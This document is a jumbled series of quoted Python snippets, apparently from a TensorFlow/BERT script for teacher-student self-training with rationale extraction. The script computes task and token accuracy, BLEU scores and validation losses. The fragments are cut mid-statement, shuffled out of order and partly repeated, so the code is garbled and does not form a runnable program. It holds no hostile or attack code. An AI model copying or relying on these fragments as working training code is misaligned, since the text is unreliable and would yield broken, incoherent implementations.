logger.info(\"Extracted rationale from teacher model as input", "truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct", "model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred", "logger.info (\"Best Test task acc for run {} with total loss : {}\".format(counter,", "y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token", "all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if", "np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out", "pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p,", "= acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = []", "None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if", "(teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model):", "type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True,", "in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope():", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None", "[1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "{}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs,", "axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in", "TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3,", "epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc =", "None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss", "= truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w')", "(task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch,", "test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+=", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat", "axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set", "with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task", "np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif", "type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0],", "0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred)))", "of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0)", "{}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T,", "' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in", "len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in", "best base model based on validation loss best_base_model = None best_validation_loss = np.inf", "score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1,", "temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i]", "in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip", "indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx =", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {}", "X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))],", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3", "from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model", "X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in", "(task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc =", "def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))*", "test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev),", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n", "elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "(X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:]", "in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size],", "= tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "#labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels))", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_:", "'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'],", "np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test =", "y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc,", "'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_:", "logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:],", "= y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train", "\"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from", "for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx)", "np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss',", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None})", "= np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10]))", "logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on", "logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from", "of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales", "in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in", "= int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test)", "= deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss", "max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif", "(\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model", "logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample =", "= [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text']", "epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss =", "y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0]", "for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc", "in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl'", "elif 'joint' in type_: if 'pruthi_' in type_: out = y_train acc, y_pred,", "y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred", "coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4", "i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text)", "y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape:", "np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred =", "r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token", "sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3,", "best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "= np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in", "loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss,", "y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf", "restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in", "0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "- valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch", "[] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model", "out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc", "best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc:", "axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro')))", "acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc", "{}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1)", "axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_:", "y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc =", "teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as", "out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1)", "model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch))", "{}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape,", "for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text", "X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev,", "os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file)", "X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103)", "'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in", "# class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def", "y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss',", "type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier':", "sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl'", "code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from", "are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\":", "'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'],", "out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc,", "out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc,", "if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if", "\".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss", "val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test,", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in", "out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "\"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103,", "range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1,", "type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_:", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0],", "val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc", "np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) #", "logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)])", "= X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) #", "acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "= [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] ==", "len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred),", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in", "1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher'", "reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))*", "= np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]):", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_:", "np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0]", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices],", "\"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:],", "1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0]", "= np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model =", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train,", "y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1,", 